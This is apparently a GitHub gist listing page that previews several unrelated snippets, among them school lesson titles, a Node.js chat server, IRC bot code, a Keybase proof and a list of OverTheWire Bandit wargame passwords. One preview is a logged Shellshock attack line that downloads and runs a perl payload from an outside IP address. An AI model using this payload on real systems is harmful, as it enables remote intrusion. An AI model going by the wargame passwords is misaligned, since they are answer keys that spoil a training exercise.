This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. 20140825 - Dorian Gray Icebreakers | |
2. 20140826 - Intro to Rhetorical Situation | |
3. 20140902 - Rhetorical Situations + Mood Analysis | |
4. 20140903 - On Writing Well Notes | |
5. 20140909 - ACT Results + English Patterns | |
6. 20140915 - Tools for Moving Past Summary | |
7. 20140920 - They Say / I Say |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Load the TCP Library | |
net = require('net'); | |
// Keep track of the chat clients | |
var clients = []; | |
// Start a TCP Server | |
net.createServer(function (socket) { | |
// Identify this client |
I hereby claim:
- I am failedxyz on github.
- I am failedxyz (https://keybase.io/failedxyz) on keybase.
- I have a public key whose fingerprint is 091D 3A47 D137 DC0F CEDC 1AD9 F8A8 A156 0109 AA3F
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bandit0 bandit0 | |
bandit1 boJ9jbbUNNfktd78OOpsqOltutMc3MY1 | |
bandit2 CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9 | |
bandit3 UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK | |
bandit4 pIwrPrtPN36QITSp3EQaw936yaFoFgAB | |
bandit5 koReBOKuIDDepwhWk7jZC0RTdopnAYKh | |
bandit6 DXjZPULLxYr17uwoI01bNLQbtFemEgo7 | |
bandit7 HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs | |
bandit8 cvX2JJa4CFALtqS87jk27qwqGhBM9plV | |
bandit9 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys; | |
import socket; | |
import string; | |
import random; | |
HOST = "irc.mibbit.net"; | |
PORT = 6667; | |
NICK = "heibot"; | |
CHANNEL = "#yolo1"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype> | |
<html> | |
<head> | |
<title><$WikiTitle$></title> | |
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootswatch/3.3.2/simplex/bootstrap.min.css" /> | |
</head> | |
<body> | |
<nav class="navbar navbar-default"> | |
<div class="container"> | |
<div class="navbar-header"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys; | |
import socket; | |
import string; | |
import random; | |
import urllib2; | |
import hashlib; | |
def genprefix(): | |
return (random.choice("abcdef") + hashlib.md5(random.choice([ | |
"heibot", "asdfbot", |
https://medium.com/@failedxyz/a-much-needed-apology-8f50537a8932
Hint 2 for 3 hard: it's based on ASCII.